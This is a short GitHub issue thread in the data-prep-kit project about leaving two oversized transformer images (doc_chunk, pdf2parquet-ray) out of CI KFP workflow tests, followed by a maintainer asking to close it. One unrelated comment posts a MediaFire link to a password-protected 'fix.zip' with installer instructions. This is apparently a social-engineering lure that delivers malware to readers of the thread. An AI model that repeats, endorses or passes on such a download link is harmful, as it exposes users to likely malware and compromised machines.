### ISSUE TITLE
[Feature] Add a black list for KFP workflow tests

### ISSUE THREAD

**Issue by roytman** [data-prep-kit/data-prep-kit#556]
### Search before asking

- [X] I searched the [issues](https://github.com/IBM/data-prep-lab/issues) and found no similar issues.

### Component

KFP workflows

### Feature

Some of the latest transformer images are too big, and as a result CI/CD workflow tests fail with "out of space" error.
It is not the optimal solution, but meantime we can just exclude these problematic workflows from the CICD KFP tests.

The candidates to the black list:

- doc_chunk
- pdf2parquet-ray 

### Are you willing to submit a PR?

- [X] Yes I am willing to submit a PR!

**Comment by Gross-Igna** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by daw3rd** [comment]
@roytman I believe this has been addressed.  Can we close it?
